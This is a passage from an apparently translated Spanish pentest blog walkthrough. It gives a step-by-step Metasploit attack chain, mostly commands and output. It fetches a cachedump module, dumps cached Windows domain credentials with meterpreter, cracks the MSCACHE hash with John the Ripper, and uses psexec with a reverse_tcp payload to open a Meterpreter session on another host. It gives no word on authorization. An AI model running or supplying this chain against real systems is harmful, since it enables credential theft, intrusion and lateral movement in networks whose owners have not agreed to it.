wget http://lab.mediaservice.net/code/cachedump.rb
2. Guardar en el directorio de Metasploit (Backtrack):
mv cachedump.rb /pentest/exploits/framework3/modules/post/windows/gather
3. Cargar la consola, hackear algo y obtener privilegios de SYSTEM, luego:
meterpreter > run post/windows/gather/cachedump [*] Executing module against WORKSTATION244 [*] Obtaining the boot key... [*] Trying 'XP' style... [*] Getting PolSecretEncryptionKey... [*] XP compatible client [*] Lsa Key: 29249a6480f428cb6dacba2d30d5292c [*] Getting LK$KM... [*] Dumping cached credentials... Username : jdoe Hash : 592cdfbc3f1ef77ae95c75f851e37166 Last login : 2010-05-11 01:43:48 DNS Domain Name : CONTOSO.CO Effective Name : jdo Full Name : eJane Do User ID : 1107 Primary Group ID : 513 Additional groups : 33620069 33554432 34013184 Logon domain name : CONTOS ---------------------------------------------------------------------- [*] John the Ripper format: jdoe:592cdfbc3f1ef77ae95c75f851e37166:CONTOSO.CO:CONTOS [*] Hash are in MSCACHE format. (mscash) meterpreter >
4. Romperla:
cat lab.dic | ./john --stdin lab.mscash --format=mscash --pot=lab.pot Loaded 1 password hash (M$ Cache Hash [Generic 1x]) ASDqwe123 (jdoe) guesses: 1 time: 0:00:00:00 c/s: 500 trying: ASDqwe123
5. Usarla:
meterpreter > background msf exploit(handler) > route add 10.10.10.0 255.255.255.0 1 msf exploit(handler) > use exploit/windows/smb/psexec msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST X.X.X.X LHOST => X.X.X.X msf exploit(psexec) > set LPORT 80 LPORT => 80 msf exploit(psexec) > set SMBDomain Contoso SMBDomain => Contoso msf exploit(psexec) > set SMBUser jdoe SMBUser => jdoe msf exploit(psexec) > set SMBPass ASDqwe123 SMBPass => ASDqwe123 msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBDomain Contoso no The Windows domain to use for authentication SMBPass ASDqwe123 no The password for the specified username SMBUser jdoe no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, none, process LHOST X.X.X.X yes The listen address LPORT 80 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(psexec) > set RHOST 10.10.10.200 RHOST => 10.10.10.200 msf exploit(psexec) > exploit [*] Started reverse handler on X.X.X.X:80 [*] Connecting to the server... [*] Authenticating to 10.10.10.200:445|Contoso as user 'jdoe'... [*] Uploading payload... [*] Created \jSlxARUj.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (SyHtwKpn - "MbEXNupOpYUL")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \jSlxARUj.exe... [*] Meterpreter session 2 opened (X.X.X.X:80 -> X.X.X.X:54430) at Mon Feb 14 22:23:00 +0000 2011
Woot ;-)
Cross-posted translation from Room362
